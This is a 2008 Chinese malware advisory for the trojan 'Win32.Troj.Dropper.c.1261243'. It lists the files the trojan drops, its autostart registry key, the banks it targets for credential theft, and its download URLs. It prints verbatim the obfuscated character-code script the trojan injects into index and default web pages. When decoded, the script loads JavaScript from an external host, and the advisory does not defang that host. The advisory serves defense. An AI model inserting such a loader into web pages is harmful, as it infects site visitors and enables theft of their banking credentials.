Win32.Troj.Dropper.c.1261243

王朝system·作者佚名  2008-08-14
窄屏简体版  字體: |||超大  

病毒名称(中文):

病毒别名:

威胁级别:

★☆☆☆☆

病毒类型:

木马程序

病毒长度:

1261243

影响系统:

WinNTWin2000WinXPWin2003

病毒行为:

这是一个会盗取用户信息的木马程序。病毒运行后,将隐蔽安装到用户计算机,并增加启动项以自启动。病毒通过运行一个隐藏的SoundMan.exe进程,监控用户是否打开了

指定的网上银行网址,假如是则监控用户鼠标状态,盗取用户银行帐号密码等信息,并发送至黑客邮箱。请广大使用网上银行的用户注重目录下是否存在该病毒文件,以便预防。

另外,该病毒还会修改硬盘中文件名为"index.*"和"default.*"的网页文件,插入病毒代码,并下载大量隐蔽软件安装至用户电脑,使用户计算机安全受到危胁。

1.生成文件

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\dll.fnr

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\eAPI.fne

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\eCompress.fne

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\eImgConverter.fne

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\eLIB.fne

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\HideProc.dll

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\internet.fne

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\krnln.fnr

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\mon

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\moz

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\Nhook.dll

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\shell.fne

%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\SOUNDMAN.EXE

2.注册表项

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunSoundNan"%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\SOUNDMAN.EXE"

3.修改硬盘中文件为"index.*"和"default.*"的网页文件

index.asp

index.jsp

index.php

index.htm

index.html

default.asp

default.jsp

default.php

default.htm

default.html

并插入以下脚本

t="60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,99,115,46,99,115,107,105,99,107,46,99,110,47,99,115,47,115,99,46,106,115,62,60,47,115,99,114,105,112,116,62"

t=eval("String.fromCharCode("+t+")");

document.write(t);

4.盗取以下网上银行用户信息,并发送至黑客163.com邮箱

招商银行网上支付中心

招商银行一网通-个人银行大众版hxxps://pbsz.ebank.cmbchina.com

中国农业银行hxxp://www.abchina.com

中信银行网上银行hxxps://personal.bank.ecitic.com:444

公司银行介绍_中信金融网hxxps://homebank.citicib.com.cn:91/

浦东发展银行hxxps://ebanks.spdb.com.cn

5.尝试连接远程服务器,下载大量隐蔽软件安装至用户计算机

hxxp://bbs.xxxx.com/pic/logo6.jpg

hxxp://cs.csxxxx.cn/cs/2.jpg

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航